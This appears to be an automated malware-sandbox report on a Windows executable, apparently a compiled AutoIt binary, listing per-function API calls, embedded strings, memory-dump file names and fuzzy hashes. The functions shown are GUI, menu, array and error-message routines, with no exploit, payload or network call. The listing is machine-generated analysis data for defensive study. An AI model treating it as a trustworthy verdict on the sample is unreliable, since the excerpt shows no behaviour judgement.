GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00DEE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00E0F90A
LoadStringW.USER32(00000000,?,00DEE029,00000001), ref: 00E0F90D
__swprintf.LIBCMT ref: 00E0F95D
__swprintf.LIBCMT ref: 00E0F96E
_wprintf.LIBCMT ref: 00E0FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E0FA12
Line %d:, xrefs: 00E0F968
^ ERROR, xrefs: 00E0F9C3
Line %d (File "%s"):, xrefs: 00E0F957
Error: , xrefs: 00E0F9E5

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 6883e9ee253ab03d90acf2080456aab5d3b25eaa9da73e47e418366e020ba954
Instruction ID: 8140a8ce7bda7816bb08596e6561d207c9d2e467e12760e92c5f4510c3b8bd26
Opcode Fuzzy Hash: 6883e9ee253ab03d90acf2080456aab5d3b25eaa9da73e47e418366e020ba954
Instruction Fuzzy Hash: C5413972904209EBCF14FBE0DD86EEE7B78EF54300F500065F506720A6EA316E59CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00E3C1AC, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E3C1FC
GetFocus.USER32(?,?,?,?), ref: 00E3C20C
GetDlgCtrlID.USER32 ref: 00E3C217
_memset.LIBCMT ref: 00E3C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E3C36D
GetMenuItemCount.USER32 ref: 00E3C38D
GetMenuItemID.USER32(?,00000000), ref: 00E3C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E3C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E3C41C
CheckMenuRadioItem.USER32 ref: 00E3C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E3C489

Strings

0, xrefs: 00E3C33A

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 5b47f2ac20a95bf9443ab466c8e731ee904458f1184e96a7678a59299efdcce3
Instruction ID: 514babc0d46c96aa47a37d6d3f916f72b3f8c40125b09314bb3d9460337ea71e
Opcode Fuzzy Hash: 5b47f2ac20a95bf9443ab466c8e731ee904458f1184e96a7678a59299efdcce3
Instruction Fuzzy Hash: 67817E71608301AFD714DF15C898A7BBFE4EB88718F20592EF995B7291C770D905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DB6A8C, Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00DD0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00DB6B0C,?,00008000), ref: 00DD0973

Part of subcall function 00DB4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DB4743,?,?,?,00DB715A,?,?,?,?,00DB108C), ref: 00DB4770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00DB6BAD

Part of subcall function 00DD0DB6: _malloc.LIBCMT ref: 00DD0DCE

SetCurrentDirectoryW.KERNEL32(?), ref: 00DB6CFA

Part of subcall function 00DB586D: _wcscpy.LIBCMT ref: 00DB58A5

Part of subcall function 00DD363D: _iswctype.LIBCMT ref: 00DD3645

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00DEE496
Bad directive syntax error, xrefs: 00DEE79D
AU3!, xrefs: 00DB6B61
Unterminated string, xrefs: 00DEE7E4
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00DEE421
Error opening the file, xrefs: 00DEE43D, 00DEE4B8
EA06, xrefs: 00DEE452

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_malloc_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 489323609-1018226102
Opcode ID: 875324dacd869325ca777407ccca060a4d926523b127782da346b73c75de670a
Instruction ID: a47dd75d3c9a5a072132b8dde3f22beb69a33e028f9f8929c7385f782fce743c
Opcode Fuzzy Hash: 875324dacd869325ca777407ccca060a4d926523b127782da346b73c75de670a
Instruction Fuzzy Hash: 3A026870108341DFC724EF24D881AAFBBE5EF99314F54491EF49A972A2DB30D949CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E12D36, Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E12D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E12DDD
GetMenuItemCount.USER32 ref: 00E12E66
DeleteMenu.USER32(00E75890,00000005,00000000,000000F5,?,?), ref: 00E12EF6
DeleteMenu.USER32(00E75890,00000004,00000000), ref: 00E12EFE
DeleteMenu.USER32(00E75890,00000006,00000000), ref: 00E12F06
DeleteMenu.USER32(00E75890,00000003,00000000), ref: 00E12F0E
GetMenuItemCount.USER32 ref: 00E12F16
SetMenuItemInfoW.USER32 ref: 00E12F4C
GetCursorPos.USER32(?), ref: 00E12F56
SetForegroundWindow.USER32(00000000), ref: 00E12F5F
TrackPopupMenuEx.USER32(00E75890,00000000,?,00000000,00000000,00000000), ref: 00E12F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E12F7E

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 75f39569b7aa2d0cdeb0515d64e8a188cdaa13304a7f1fa37e2c6123366f15c2
Instruction ID: 6e4e863def0be5a69c4322648526e02f31415734771cbcd64adbb9008ae63b18
Opcode Fuzzy Hash: 75f39569b7aa2d0cdeb0515d64e8a188cdaa13304a7f1fa37e2c6123366f15c2
Instruction Fuzzy Hash: 3171B170640209BEEB218F55DC49FEABF64FB04728F10121AF715BA1E1C7B15CA0D795

Uniqueness

Uniqueness Score: -1.00%

Function 00E0F7A1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DEE2A0,00000010,?,Bad directive syntax error,00E3F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00E0F7C2
LoadStringW.USER32(00000000,?,00DEE2A0,00000010), ref: 00E0F7C9

Part of subcall function 00DB7DE1: _memmove.LIBCMT ref: 00DB7E22

_wprintf.LIBCMT ref: 00E0F7FC
__swprintf.LIBCMT ref: 00E0F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E0F88D

Strings

Line %d:, xrefs: 00E0F818
Error: , xrefs: 00E0F85B
., xrefs: 00E0F873
%s (%d) : ==> %s.: %s %s, xrefs: 00E0F7F7
Line %d (File "%s"):, xrefs: 00E0F833

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: a4bfadb6383924881be166f232181d171d58cae289a2606f1c7fd52dbf0ede37
Instruction ID: 2838db56aaecad4f3519b085ede294cf9118cfcb0fcb09c4baa0869f3d428547
Opcode Fuzzy Hash: a4bfadb6383924881be166f232181d171d58cae289a2606f1c7fd52dbf0ede37
Instruction Fuzzy Hash: 04215E3294021EEBCF11AF90DC5AEED7B39FF14300F04446AF516760A2DA719A68DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00DB201B, Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DB2036,?,00000000,?,?,?,?,00DB16CB,00000000,?), ref: 00DB1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DB20D3
KillTimer.USER32(-00000001,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DB216E
DestroyAcceleratorTable.USER32 ref: 00DEBCA6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBCD7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBCEE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DB16CB,00000000,?,?,00DB1AE2,?,?), ref: 00DEBD0A
DeleteObject.GDI32(00000000), ref: 00DEBD1C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 3bb7c1ec5652b1179c0d5a9ef0fcd1b471e711bcf368920e3d122bfaaca0eaec
Instruction ID: 3df981cdd468803e3626c2b0cce04bda03111df4c289eff38ea6e0f388cde59a
Opcode Fuzzy Hash: 3bb7c1ec5652b1179c0d5a9ef0fcd1b471e711bcf368920e3d122bfaaca0eaec
Instruction Fuzzy Hash: 29618D32500B40DFDB29AF1ADD49B7A7BF1FB40312F58442AE4876A560C7B0A895DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DB21A5, Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00DB25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DB25EC

GetSysColor.USER32(0000000F), ref: 00DB21D3

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 74d31e7439eaa4d1752cf9c623544e8b4da52865c5e18dbcb8edd6a400755383
Instruction ID: fca7a8587a18892b14b937d5452b512da41403dd55e9dbc96cd5be6328b9192d
Opcode Fuzzy Hash: 74d31e7439eaa4d1752cf9c623544e8b4da52865c5e18dbcb8edd6a400755383
Instruction Fuzzy Hash: 1C417C32400144EEDB259F29E889BF93B65EB06331F184266FE66DA1E6C7318C42DB75

Uniqueness

Uniqueness Score: -1.00%

Function 00E3BF8C, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DB2612: GetWindowLongW.USER32(?,000000EB), ref: 00DB2623

Part of subcall function 00DB2344: GetCursorPos.USER32(?,?,00E757B0,?,00E757B0,00E757B0,?,00DB1283,00000000,00000002,00000000), ref: 00DB2357
Part of subcall function 00DB2344: ScreenToClient.USER32 ref: 00DB2374
Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000001), ref: 00DB2399
Part of subcall function 00DB2344: GetAsyncKeyState.USER32(00000002), ref: 00DB23A7

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E3BFF4
ImageList_EndDrag.COMCTL32 ref: 00E3BFFA
ReleaseCapture.USER32 ref: 00E3C000
SetWindowTextW.USER32(?,00000000), ref: 00E3C0AA
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E3C0BD
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E3C19F

Strings

@GUI_DRAGFILE, xrefs: 00E3C134
@GUI_DROPID, xrefs: 00E3C0F1
pb, xrefs: 00E3C148
pb, xrefs: 00E3C10D

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID$pb$pb
API String ID: 1924731296-1789618395
Opcode ID: 4b7a2c7e70b482c131882563dfc0c82c9b242f182e4b8cd0538a50c846aaa0f0
Instruction ID: cfe15fc4597f061efab55082a2b9b21859b8703e809a3f365694d2d84d93cfd2
Opcode Fuzzy Hash: 4b7a2c7e70b482c131882563dfc0c82c9b242f182e4b8cd0538a50c846aaa0f0
Instruction Fuzzy Hash: 38517D71604304EFDB04EF24CC5AFAA7BE5EF84314F14492DF595A72A2CB70A948DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E12527, Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E12542
GetMenuItemInfoW.USER32(00E75890,000000FF,00000000,00000030), ref: 00E125A3
SetMenuItemInfoW.USER32 ref: 00E125D9
Sleep.KERNEL32(000001F4), ref: 00E125EB
GetMenuItemCount.USER32 ref: 00E1262F
GetMenuItemID.USER32(?,00000000), ref: 00E1264B
GetMenuItemID.USER32(?,-00000001), ref: 00E12675
GetMenuItemID.USER32(?,?), ref: 00E126BA
CheckMenuRadioItem.USER32 ref: 00E12700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E12714
SetMenuItemInfoW.USER32 ref: 00E12735

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7bf2b4ff2d19daca2fbe23a41c23de71a506ee99de43541e7139f11f843809d6
Instruction ID: 65f2bf10e671c848119bb36293ea5c9280d2fc3043c99a241cd1856ad95f018e
Opcode Fuzzy Hash: 7bf2b4ff2d19daca2fbe23a41c23de71a506ee99de43541e7139f11f843809d6
Instruction Fuzzy Hash: E6618EB0900249AFDB11CFA4DC889FF7BB9EB01308F14115DEA42B7291D731ADA5DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00E06B98, Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E06BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00E06C18
VariantInit.OLEAUT32(?), ref: 00E06C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E06C4A
VariantCopy.OLEAUT32(?,?), ref: 00E06C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E06CB1
VariantClear.OLEAUT32(?), ref: 00E06CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00E06CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E06CDC
VariantClear.OLEAUT32(?), ref: 00E06CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E06CF9

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6541f3dba6dcd77460c5931490ea2732ed78845d49491262253673c83d52bd26
Instruction ID: 65fbbcc77fbfe5d6be036370a9e58ee9ab3b2d3cbff4621b74c7a766c0f5dc4e
Opcode Fuzzy Hash: 6541f3dba6dcd77460c5931490ea2732ed78845d49491262253673c83d52bd26
Instruction Fuzzy Hash: C9414F75E00119AFDF04DF65D888AEEBBB9EF08354F008069E955B7261CB30A959CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E17990, Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E17A6C

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 158bb4a0a7276bcf55285a3777d2db432d242911abdd33ce37600db7d985ab9d
Instruction ID: 963cd0428e6ccfb62b794a75946cb7cd07deb7e3cd62b3bbef72986e10ba335f
Opcode Fuzzy Hash: 158bb4a0a7276bcf55285a3777d2db432d242911abdd33ce37600db7d985ab9d
Instruction Fuzzy Hash: 49B18D7190820A9FDB00DFA4C884BFEBBF5EF49B25F205429E591F7241D734A985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2E26, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 00DB2EAE

Part of subcall function 00DB1DB3: GetClientRect.USER32 ref: 00DB1DDC
Part of subcall function 00DB1DB3: GetWindowRect.USER32 ref: 00DB1E1D
Part of subcall function 00DB1DB3: ScreenToClient.USER32 ref: 00DB1E45

GetDC.USER32 ref: 00DECD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DECD45
SelectObject.GDI32(00000000,00000000), ref: 00DECD53
SelectObject.GDI32(00000000,00000000), ref: 00DECD68
ReleaseDC.USER32 ref: 00DECD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DECDFB

Strings

U, xrefs: 00DECCD0

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3f638ecadba7673721c77eb4e0c9625343d4f2d237ae803bd05416fd39880ddd
Instruction ID: d0742f661a9716c611bd7c26d3a2f70ff0cb01bd4266117b03e2bb295cf330ea
Opcode Fuzzy Hash: 3f638ecadba7673721c77eb4e0c9625343d4f2d237ae803bd05416fd39880ddd
Instruction Fuzzy Hash: AD718E31900249DFCF259F66CC84AFA7BB5FB48320F18526AFD566A265C731C892DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00E38645, Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E386FF

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 0ad189ae90b783e085fd2106b6ded8860e8c0507cf75cf3d7513582a194a116e
Instruction ID: a994a9ead58bd2d0dbc7db42870087b7db85bbbfd31bf04f223715c5957ade17
Opcode Fuzzy Hash: 0ad189ae90b783e085fd2106b6ded8860e8c0507cf75cf3d7513582a194a116e
Instruction Fuzzy Hash: AC51C171500348BEEB289F25CE8EFAD3FA5EB05354F602126F955F61A0CFB1A984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2B72, Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 00DEC2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DEC319
LoadImageW.USER32 ref: 00DEC331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00DEC34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00DEC370
DestroyIcon.USER32(00000000), ref: 00DEC37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00DEC39C
DestroyIcon.USER32(?), ref: 00DEC3AB

Part of subcall function 00E3A4AF: DeleteObject.GDI32(00000000), ref: 00E3A4E8

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: dbb1ef9115ae7e51b7b8cab64a6e4b399abb64575674d2a6c8f6a82698148301
Instruction ID: 3bc14560e965c0e92ca569df3821d395ef34e5a848a7e85a6d9f01898638a47d
Opcode Fuzzy Hash: dbb1ef9115ae7e51b7b8cab64a6e4b399abb64575674d2a6c8f6a82698148301
Instruction Fuzzy Hash: F8517A71A10249EFDB24EF66CC45FBA3BB5EB48310F144528F946A7290DBB0EC91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E29B23, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00E29B7B
NULL Pointer assignment, xrefs: 00E29BA4, 00E29EC8

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 78263475504873af16ce6d73dea5a46aa884d0ae13ae6ef8c8ebbfb8e0110ae8
Instruction ID: 0143675cca247f271d6f41c13f29ed0d4b7b4d545a7fa38c78aea8b80cb1a74b
Opcode Fuzzy Hash: 78263475504873af16ce6d73dea5a46aa884d0ae13ae6ef8c8ebbfb8e0110ae8
Instruction Fuzzy Hash: FAC1A371A002299FDF14DF98E885BAEB7F5FF48314F15A429E905B7282E770AD44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E12F94, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E13033

Strings

stop, xrefs: 00E13004
warning, xrefs: 00E1301C
info, xrefs: 00E12FD4
question, xrefs: 00E12FEC
blank, xrefs: 00E12FB5

Memory Dump Source

Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: fc74e2ba0a6ce0b071308b37ec3d57782e0e84c4a86f88bbb8dc64150c7ab2bf
Instruction ID: c11139bbc52407123de7caf5c71457204c90c44c8c16ed7f33238466f8d18aa1
Opcode Fuzzy Hash: fc74e2ba0a6ce0b071308b37ec3d57782e0e84c4a86f88bbb8dc64150c7ab2bf
